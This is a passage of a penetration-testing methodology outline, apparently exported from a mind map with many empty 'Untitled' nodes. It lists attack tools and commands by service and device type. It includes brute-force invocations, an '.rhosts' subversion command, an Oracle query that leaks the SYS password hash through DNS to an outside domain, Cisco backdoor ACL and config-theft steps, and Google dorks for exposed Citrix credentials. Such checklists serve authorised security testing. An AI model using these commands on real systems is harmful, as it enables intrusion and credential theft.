16.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
16.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
16.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
16.15.2. ldap brute force
16.15.2.1. bf_ldap
16.15.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
16.15.2.2. K0ldS
16.15.2.3. LDAP_Brute.pl
16.15.3. Examine Configuration Files
16.15.3.1. General
16.15.3.1.1. containers.ldif
16.15.3.1.2. ldap.cfg
16.15.3.1.3. ldap.conf
16.15.3.1.4. ldap.xml
16.15.3.1.5. ldap-config.xml
16.15.3.1.6. ldap-realm.xml
16.15.3.1.7. slapd.conf
16.15.3.2. IBM SecureWay V3 server
16.15.3.2.1. V3.sas.oc
16.15.3.3. Microsoft Active Directory server
16.15.3.3.1. msadClassesAttrs.ldif
16.15.3.4. Netscape Directory Server 4
16.15.3.4.1. nsslapd.sas_at.conf
16.15.3.4.2. nsslapd.sas_oc.conf
16.15.3.5. OpenLDAP directory server
16.15.3.5.1. slapd.sas_at.conf
16.15.3.5.2. slapd.sas_oc.conf
16.15.3.6. Sun ONE Directory Server 5.1
16.15.3.6.1. 75sas.ldif
16.16. PPTP/L2TP/VPN port 500/1723 open
16.16.1. Enumeration
16.16.1.1. ike-scan
16.16.1.2. ike-probe
16.16.2. Brute-Force
16.16.2.1. ike-crack
16.16.3. Reference Material
16.16.3.1. PSK cracking paper
16.16.3.2. SecurityFocus Infocus
16.16.3.3. Scanning a VPN Implementation
16.17. Modbus port 502 open
16.17.1. modscan
16.18. rlogin port 513 open
16.18.1. Rlogin Enumeration
16.18.1.1. Find the files
16.18.1.1.1. find / -name .rhosts
16.18.1.1.2. locate .rhosts
16.18.1.2. Examine Files
16.18.1.2.1. cat .rhosts
16.18.1.3. Manual Login
16.18.1.3.1. rlogin hostname -l username
16.18.1.3.2. rlogin <IP>
16.18.1.4. Subvert the files
16.18.1.4.1. echo ++ > .rhosts
16.18.2. Rlogin Brute force
16.18.2.1. Hydra
16.19. rsh port 514 open
16.19.1. Rsh Enumeration
16.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
16.19.2. Rsh Brute Force
16.19.2.1. rsh-grind
16.19.2.2. Hydra
16.19.2.3. medusa
16.20. SQL Server Port 1433 1434 open
16.20.1. SQL Enumeration
16.20.1.1. piggy
16.20.1.2. SQLPing
16.20.1.2.1. sqlping ip_address/hostname
16.20.1.3. SQLPing2
16.20.1.4. SQLPing3
16.20.1.5. SQLpoke
16.20.1.6. SQL Recon
16.20.1.7. SQLver
16.20.2. SQL Brute Force
16.20.2.1. SQLPAT
16.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
16.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
16.20.2.2. SQL Dict
16.20.2.3. SQLAT
16.20.2.4. Hydra
16.20.2.5. SQLlhf
16.20.2.6. ForceSQL
16.21. Citrix port 1494 open
16.21.1. Citrix Enumeration
16.21.1.1. Default Domain
16.21.1.2. Published Applications
16.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
16.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
16.21.2. Citrix Brute Force
16.21.2.1. bforce.js
16.21.2.2. connect.js
16.21.2.3. Citrix Brute-forcer
16.21.2.4. Reference Material
16.21.2.4.1. Hacking Citrix - the legitimate backdoor
16.21.2.4.2. Hacking Citrix - the forceful way
16.22. Oracle Port 1521 Open
16.22.1. Oracle Enumeration
16.22.1.1. oracsec
16.22.1.2. Repscan
16.22.1.3. Sidguess
16.22.1.4. Scuba
16.22.1.5. DNS/HTTP Enumeration
16.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
16.22.1.5.2. Untitled
16.22.1.6. WinSID
16.22.1.7. Oracle default password list
16.22.1.8. TNSVer
16.22.1.8.1. tnsver host [port]
16.22.1.9. TCP Scan
16.22.1.10. Oracle TNSLSNR
16.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
16.22.1.11. TNSCmd
16.22.1.11.1. perl tnscmd.pl -h ip_address
16.22.1.11.2. perl tnscmd.pl version -h ip_address
16.22.1.11.3. perl tnscmd.pl status -h ip_address
16.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
16.22.1.12. LSNrCheck
16.22.1.13. Oracle Security Check (needs credentials)
16.22.1.14. OAT
16.22.1.14.1. sh opwg.sh -s ip_address
16.22.1.14.2. opwg.bat -s ip_address
16.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
16.22.1.15. OScanner
16.22.1.15.1. sh oscanner.sh -s ip_address
16.22.1.15.2. oscanner.exe -s ip_address
16.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
16.22.1.15.4. reportviewer.exe oscanner_saved_file.xml
16.22.1.16. NGS Squirrel for Oracle
16.22.1.17. Service Register
16.22.1.17.1. Service-register.exe ip_address
16.22.1.18. PLSQL Scanner 2008
16.22.2. Oracle Brute Force
16.22.2.1. OAK
16.22.2.1.1. ora-getsid hostname port sid_dictionary_list
16.22.2.1.2. ora-auth-alter-session host port sid username password sql
16.22.2.1.3. ora-brutesid host port start
16.22.2.1.4. ora-pwdbrute host port sid username password-file
16.22.2.1.5. ora-userenum host port sid userlistfile
16.22.2.1.6. ora-ver -e (-f -l -a) host port
16.22.2.2. breakable (Targets Application Server Port)
16.22.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
16.22.2.3. SQLInjector (Targets Application Server Port)
16.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
16.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
16.22.2.4. Check Password
16.22.2.5. orabf
16.22.2.5.1. orabf [hash]:[username] [options]
16.22.2.6. thc-orakel
16.22.2.6.1. Cracker
16.22.2.6.2. Client
16.22.2.6.3. Crypto
16.22.2.7. DBVisualisor
16.22.2.7.1. Sql scripts from pentest.co.uk
16.22.2.7.2. Manual sql input of previously reported vulnerabilties
16.22.3. Oracle Reference Material
16.22.3.1. Understanding SQL Injection
16.22.3.2. SQL Injection walkthrough
16.22.3.3. SQL Injection by example
16.22.3.4. Advanced SQL Injection in Oracle databases
16.22.3.5. Blind SQL Injection
16.22.3.6. SQL Cheatsheets
16.22.3.6.1. Untitled
16.23. NFS Port 2049 open
16.23.1. NFS Enumeration
16.23.1.1. showmount -e hostname/ip_address
16.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
16.23.2. NFS Brute Force
16.23.2.1. Interact with NFS share and try to add/delete
16.23.2.2. Exploit and Confuse Unix
16.23.3. Examine Configuration Files
16.23.3.1. /etc/exports
16.23.3.2. /etc/lib/nfs/xtab
16.23.4. nmap nse script
16.23.4.1. nfs-showmount
16.24. Compaq/HP Insight Manager Port 2301,2381open
16.24.1. HP Enumeration
16.24.1.1. Authentication Method
16.24.1.1.1. Host OS Authentication
16.24.1.1.2. Default Authentication
16.24.1.2. Wikto
16.24.1.3. Nstealth
16.24.2. HP Bruteforce
16.24.2.1. Hydra
16.24.2.2. Acunetix
16.24.3. Examine Configuration Files
16.24.3.1. path.properties
16.24.3.2. mx.log
16.24.3.3. CLIClientConfig.cfg
16.24.3.4. database.props
16.24.3.5. pg_hba.conf
16.24.3.6. jboss-service.xml
16.24.3.7. .namazurc
16.25. MySQL port 3306 open
16.25.1. Enumeration
16.25.1.1. nmap -A -n -p3306 <IP Address>
16.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
16.25.1.3. telnet IP_Address 3306
16.25.1.4. use test; select * from test;
16.25.1.5. To check for other DB's -- show databases
16.25.2. Administration
16.25.2.1. MySQL Network Scanner
16.25.2.2. MySQL GUI Tools
16.25.2.3. mysqlshow
16.25.2.4. mysqlbinlog
16.25.3. Manual Checks
16.25.3.1. Default usernames and passwords
16.25.3.1.1. username: root password:
16.25.3.1.2. testing
16.25.3.2. Configuration Files
16.25.3.2.1. Operating System
16.25.3.2.2. Command History
16.25.3.2.3. Log Files
16.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
16.25.3.2.5. MySQL data directory (Location specified in my.cnf)
16.25.3.2.6. SSL Check
16.25.3.3. Privilege Escalation
16.25.3.3.1. Current Level of access
16.25.3.3.2. Access passwords
16.25.3.3.3. Create a new user and grant him privileges
16.25.3.3.4. Break into a shell
16.25.4. SQL injection
16.25.4.1. mysql-miner.pl
16.25.4.1.1. mysql-miner.pl http://target/ expected_string database
16.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
16.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
16.25.5. References.
16.25.5.1. Design Weaknesses
16.25.5.1.1. MySQL running as root
16.25.5.1.2. Exposed publicly on Internet
16.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
16.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
16.26. RDesktop port 3389 open
16.26.1. Rdesktop Enumeration
16.26.1.1. Remote Desktop Connection
16.26.2. Rdestop Bruteforce
16.26.2.1. TSGrinder
16.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
16.26.2.2. Tscrack
16.27. Sybase Port 5000+ open
16.27.1. Sybase Enumeration
16.27.1.1. sybase-version ip_address from NGS
16.27.2. Sybase Vulnerability Assessment
16.27.2.1. Use DBVisualiser
16.27.2.1.1. Sybase Security checksheet
16.27.2.1.2. Manual sql input of previously reported vulnerabilties
16.27.2.2. NGS Squirrel for Sybase
16.28. SIP Port 5060 open
16.28.1. SIP Enumeration
16.28.1.1. netcat
16.28.1.1.1. nc IP_Address Port
16.28.1.2. sipflanker
16.28.1.2.1. python sipflanker.py 192.168.1-254
16.28.1.3. Sipscan
16.28.1.4. smap
16.28.1.4.1. smap IP_Address/Subnet_Mask
16.28.1.4.2. smap -o IP_Address/Subnet_Mask
16.28.1.4.3. smap -l IP_Address
16.28.2. SIP Packet Crafting etc.
16.28.2.1. sipsak
16.28.2.1.1. Tracing paths: - sipsak -T -s sip:[email protected]
16.28.2.1.2. Options request:- sipsak -vv -s sip:[email protected]
16.28.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]
16.28.2.2. siprogue
16.28.3. SIP Vulnerability Scanning/ Brute Force
16.28.3.1. tftp bruteforcer
16.28.3.1.1. Default dictionary file
16.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
16.28.3.2. VoIPaudit
16.28.3.3. SiVuS
16.28.4. Examine Configuration Files
16.28.4.1. SIPDefault.cnf
16.28.4.2. asterisk.conf
16.28.4.3. sip.conf
16.28.4.4. phone.conf
16.28.4.5. sip_notify.conf
16.28.4.6. <Ethernet address>.cfg
16.28.4.7. 000000000000.cfg
16.28.4.8. phone1.cfg
16.28.4.9. sip.cfg etc. etc.
16.29. VNC port 5900^ open
16.29.1. VNC Enumeration
16.29.1.1. Scans
16.29.1.1.1. 5900^ for direct access.5800 for HTTP access.
16.29.2. VNC Brute Force
16.29.2.1. Password Attacks
16.29.2.1.1. Remote
16.29.2.1.2. Local
16.29.3. Exmine Configuration Files
16.29.3.1. .vnc
16.29.3.2. /etc/vnc/config
16.29.3.3. $HOME/.vnc/config
16.29.3.4. /etc/sysconfig/vncservers
16.29.3.5. /etc/vnc.conf
16.30. Tor Port 9001, 9030 open
16.30.1. Tor Node Checker
16.30.1.1. Ip Pages
16.30.1.2. Kewlio.net
16.30.2. nmap NSE script
16.31. Jet Direct 9100 open
16.31.1. hijetta
17. Password cracking
17.1. Rainbow crack
17.1.1. ophcrack
17.1.2. rainbow tables
17.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
17.2. Ophcrack
17.3. Cain & Abel
17.4. John the Ripper
17.4.1. ./unshadow passwd shadow > file_to_crack
17.4.2. ./john -single file_to_crack
17.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
17.4.4. ./john -show file_to_crack
17.4.5. ./john --incremental:All file_to_crack
17.5. fgdump
17.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
17.6. pwdump6
17.7. medusa
17.8. LCP
17.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
17.9.1. Domain credentials
17.9.2. Sniffing
17.9.3. pwdump import
17.9.4. sam import
17.10. aiocracker
17.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
18. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
18.1. Manual
18.1.1. Patch Levels
18.1.2. Confirmed Vulnerabilities
18.1.2.1. Severe
18.1.2.2. High
18.1.2.3. Medium
18.1.2.4. Low
18.2. Automated
18.2.1. Reports
18.2.2. Vulnerabilities
18.2.2.1. Severe
18.2.2.2. High
18.2.2.3. Medium
18.2.2.4. Low
18.3. Tools
18.3.1. GFI
18.3.2. Nessus (Linux)
18.3.2.1. Nessus (Windows)
18.3.3. NGS Typhon
18.3.4. NGS Squirrel for Oracle
18.3.5. NGS Squirrel for SQL
18.3.6. SARA
18.3.7. MatriXay
18.3.8. BiDiBlah
18.3.9. SSA
18.3.10. Oval Interpreter
18.3.11. Xscan
18.3.12. Security Manager +
18.3.13. Inguma
18.4. Resources
18.4.1. Security Focus
18.4.2. Microsoft Security Bulletin
18.4.3. Common Vulnerabilities and Exploits (CVE)
18.4.4. National Vulnerability Database (NVD)
18.4.5. The Open Source Vulnerability Database (OSVDB)
18.4.5.1. Standalone Database
18.4.5.1.1. Update URL
18.4.6. United States Computer Emergency Response Team (US-CERT)
18.4.7. Computer Emergency Response Team
18.4.8. Mozilla Security Information
18.4.9. SANS
18.4.10. Securiteam
18.4.11. PacketStorm Security
18.4.12. Security Tracker
18.4.13. Secunia
18.4.14. Vulnerabilities.org
18.4.15. ntbugtraq
18.4.16. Wireless Vulnerabilities and Exploits (WVE)
18.5. Blogs
18.5.1. Carnal0wnage
18.5.2. Fsecure Blog
18.5.3. g0ne blog
18.5.4. GNUCitizen
18.5.5. ha.ckers Blog
18.5.6. Jeremiah Grossman Blog
18.5.7. Metasploit
18.5.8. nCircle Blogs
18.5.9. pentest mokney.net
18.5.10. Rational Security
18.5.11. Rational Security
18.5.12. Rise Security
18.5.13. Security Fix Blog
18.5.14. Software Vulnerability Exploitation Blog
18.5.15. Software Vulnerability Exploitation Blog
18.5.16. Taosecurity Blog
19. AS/400 Auditing
19.1. Remote
19.1.1. Information Gathering
19.1.1.1. Nmap using common iSeries (AS/400) services.
19.1.1.1.1. Unsecured services (Port;name;description)
19.1.1.1.2. Secured services (Port;name;description)
19.1.1.2. NetCat (old school technique)
19.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
19.1.1.3. Banners Grabbing
19.1.1.3.1. Telnet
19.1.1.3.2. FTP
19.1.1.3.3. HTTP Banner
19.1.1.3.4. POP3
19.1.1.3.5. SNMP
19.1.1.3.6. SMTP
19.1.2. Users Enumeration
19.1.2.1. Default AS/400 users accounts
19.1.2.2. Error messages
19.1.2.2.1. Telnet Login errors
19.1.2.2.2. POP3 authentication Errors
19.1.2.3. Qsys symbolic link (if ftp is enabled)
19.1.2.3.1. ftp target | quote stat | quote site namefmt 1
19.1.2.3.2. cd /
19.1.2.3.3. quote site listfmt 1
19.1.2.3.4. mkdir temp
19.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
19.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
19.1.2.3.7. dir /temp/qsys/*.usrprf
19.1.2.4. LDAP
19.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
19.1.2.4.2. Tool to browse LDAP
19.1.3. Exploitation
19.1.3.1. CVE References
19.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
19.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
19.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
19.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
19.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
19.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
19.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
19.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
19.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
19.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
19.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
19.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
19.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
19.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
19.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
19.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
19.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
19.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
19.1.3.2. Access with Work Station Gateway
19.1.3.2.1. http://target:5061/WSG
19.1.3.2.2. Default AS/400 accounts.
19.1.3.3. Network attacks (next release)
19.1.3.3.1. DB2
19.1.3.3.2. QSHELL
19.1.3.3.3. Hijacking Terminals
19.1.3.3.4. Trojan attacks
19.1.3.3.5. Hacking from AS/400
19.2. Local
19.2.1. System Value Security
19.2.1.1. Untitled
19.2.1.1.1. Untitled
19.2.1.2. Untitled
19.2.1.2.1. Untitled
19.2.1.3. Untitled
19.2.1.3.1. Untitled
19.2.1.4. Untitled
19.2.1.4.1. Recommended value is 30
19.2.2. Password Policy
19.2.2.1. Untitled
19.2.2.1.1. Untitled
19.2.2.1.2. Untitled
19.2.2.2. Untitled
19.2.2.2.1. Untitled
19.2.2.3. Untitled
19.2.2.3.1. Untitled
19.2.2.4. Untitled
19.2.2.4.1. Untitled
19.2.2.5. Untitled
19.2.3. Audit level
19.2.3.1. Untitled
19.2.3.1.1. Recommended value is *SECURITY
19.2.4. Documentation
19.2.4.1. Users class
19.2.4.1.1. Untitled
19.2.4.2. System Audit Settings
19.2.4.2.1. Untitled
19.2.4.3. Special Authorities Definitions
19.2.4.3.1. Untitled
20. Bluetooth Specific Testing
20.1. Bluescanner
20.2. Bluesweep
20.3. btscanner
20.4. Redfang
20.5. Blueprint
20.6. Bluesnarfer
20.7. Bluebugger
20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
20.8. Blueserial
20.9. Bloover
20.10. Bluesniff
20.11. Exploit Frameworks
20.11.1. BlueMaho
20.11.1.1. Untitled
20.12. Resources
20.12.1. URL's
20.12.1.1. BlueStumbler.org
20.12.1.2. Bluejackq.com
20.12.1.3. Bluejacking.com
20.12.1.4. Bluejackers
20.12.1.5. bluetooth-pentest
20.12.1.6. ibluejackedyou.com
20.12.1.7. Trifinite
20.12.2. Vulnerability Information
20.12.2.1. Common Vulnerabilities and Exploits (CVE)
20.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
20.12.3. White Papers
20.12.3.1. Bluesnarfing
21. Cisco Specific Testing
21.1. Methodology
21.1.1. Scan & Fingerprint.
21.1.1.1. Untitled
21.1.1.2. Untitled
21.1.1.3. If SNMP is active, then community string guessing should be performed.
21.1.2. Credentials Guessing.
21.1.2.1. Untitled
21.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
21.1.3. Connect
21.1.3.1. Untitled
21.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
21.1.4. Check for bugs
21.1.4.1. Untitled
21.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
21.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
21.1.5. Further your attack
21.1.5.1. Untitled
21.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
21.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
21.1.5.2. Untitled
21.1.5.2.1. #> access-list 100 permit ip <IP> any
21.2. Scan & Fingerprint.
21.2.1. Port Scanning
21.2.1.1. nmap
21.2.1.1.1. Untitled
21.2.1.2. Other tools
21.2.1.2.1. Untitled
21.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
21.2.2. Fingerprinting
21.2.2.1. Untitled
21.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
21.2.2.2. Untitled
21.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
21.2.2.2.2. Untitled
21.3. Password Guessing.
21.3.1. Untitled
21.3.1.1. ./CAT -h <IP> -a password.wordlist
21.3.1.2. Untitled
21.3.2. Untitled
21.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
21.3.2.2. Untitled
21.3.3. Untitled
21.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
21.3.3.2. Untitled
21.4. SNMP Attacks.
21.4.1. Untitled
21.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
21.4.1.2. Untitled
21.4.2. Untitled
21.4.2.1. onesixytone -c SNMP.wordlist <IP>
21.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
21.4.3. Untitled
21.4.3.1. snmapwalk -v <Version> -c <Community string> <IP>
21.4.3.2. Untitled
21.5. Connecting.
21.5.1. Telnet
21.5.1.1. Untitled
21.5.1.1.1. telnet <IP>
21.5.1.1.2. Sample Banners
21.5.2. SSH
21.5.3. Web Browser
21.5.3.1. Untitled
21.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
21.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
21.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
21.5.4. TFTP
21.5.4.1. Untitled
21.5.4.1.1. Untitled
21.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
21.5.4.2. Untitled
21.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
21.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
21.5.4.2.3. Creating backdoors in Cisco IOS using TCL
21.6. Known Bugs.
21.6.1. Attack Tools
21.6.1.1. Untitled
21.6.1.1.1. Untitled
21.6.1.2. Untitled
21.6.1.2.1. Web browse to the Cisco device: http://<IP>
21.6.1.2.2. Untitled
21.6.1.2.3. Untitled
21.6.1.2.4. Untitled
21.6.1.3. Untitled
21.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
21.6.2. Common Vulnerabilities and Exploits (CVE) Information
21.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
21.7. Configuration Files.
21.7.1. Untitled
21.7.1.1. Configuration files explained
21.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
21.7.1.1.2. Untitled
21.7.1.1.3. Untitled
21.7.1.1.4. Password Encryption Utilised
21.7.1.1.5. Untitled
21.7.1.2. Configuration Testing Tools
21.7.1.2.1. Nipper
21.7.1.2.2. fwauto (Beta)
21.8. References.
21.8.1. Cisco IOS Exploitation Techniques
22. Citrix Specific Testing
22.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
22.2. Enumeration
22.2.1. web search
22.2.1.1. Google (GHDB)
22.2.1.1.1. ext:ica
22.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
22.2.1.1.3. [WFClient] Password= filetype:ica
22.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
22.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
22.2.1.1.6. inurl:/Citrix/Nfuse17/
22.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
22.2.1.2. Google Hacks (Author Discovered)
22.2.1.2.1. filetype:ica Username=
22.2.1.2.2. inurl:/Citrix/AccessPlatform/
22.2.1.2.3. inurl:LogonAgent/Login.asp
22.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
22.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
22.2.1.2.6. inurl:/Citrix/NFuse16
22.2.1.2.7. inurl:/Citrix/NFuse151/
22.2.1.2.8. allintitle:MetaFrame XP Login
22.2.1.2.9. allintitle:MetaFrame Presentation Server Login
22.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
22.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
22.2.1.3. Yahoo
22.2.1.3.1. originurlextension:ica
22.2.2. site search
22.2.2.1. Manual
22.2.2.1.1. review web page for useful information
22.2.2.1.2. review source for web page
22.2.3. generic
22.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
22.2.3.2. amap -bqv ip_address port_no.
22.2.4. citrix specific
22.2.4.1. enum.pl
22.2.4.1.1. perl enum.pl ip_address
22.2.4.2. enum.js
22.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address
22.2.4.3. connect.js
22.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application
22.2.4.4. Citrix-pa-scan
22.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
22.2.4.5. pabrute.c
22.2.4.5.1. ./pabrute pubapp list app_list ip_address
22.2.5. Default Ports
22.2.5.1. TCP
22.2.5.1.1. Citrix XML Service
22.2.5.1.2. Advanced Management Console
